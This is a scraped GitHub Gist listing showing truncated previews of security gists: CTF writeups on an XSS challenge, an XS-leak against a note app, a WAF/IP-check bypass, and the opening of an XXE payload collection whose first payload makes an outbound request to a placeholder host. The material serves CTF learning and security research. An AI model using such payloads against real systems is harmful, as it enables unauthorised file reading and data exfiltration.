Skip to content

Instantly share code, notes, and snippets.

View Sudistark's full-sized avatar
🎯
Focusing

Sudhanshu Rajbhar Sudistark

🎯
Focusing
55 followers · 55 following
View GitHub Profile
@0xGodson
0xGodson / writeup.md
Last active December 23, 2022 05:51
Nov Intigriti's XSS Challenge - Writeup
layout title subtitle cover-img thumbnail-img share-img tags
post
Intigriti's Nov XSS Challenge Writeup
XSS
/assets/img/wsc.jpg
/assets/img/wsc.jpg
/assets/img/wsc.jpg
xss
@msrkp
msrkp / exp.md
Last active July 30, 2023 15:20
LineCTF - Your Note script to perform XS-leaks to read the flag.

XS-leaks while download in headless-chrome.

TL;DR

There is a feature to search the note and a download option, so visiting the following page http://34.84.72.167/search?q=LINECTF{&download downloads a json file if the param value of q exists in notes.

Download doesn't work in headless chrome, so it throws an error.

oracle

  page.goto(url).then(() => {
@terjanq
terjanq / README.md
Last active June 14, 2024 14:36
TokyoWesterns CTF 2020 | writeups by @terjanq

TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
@staaldraad
staaldraad / XXE_payloads
Last active June 15, 2024 16:32
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>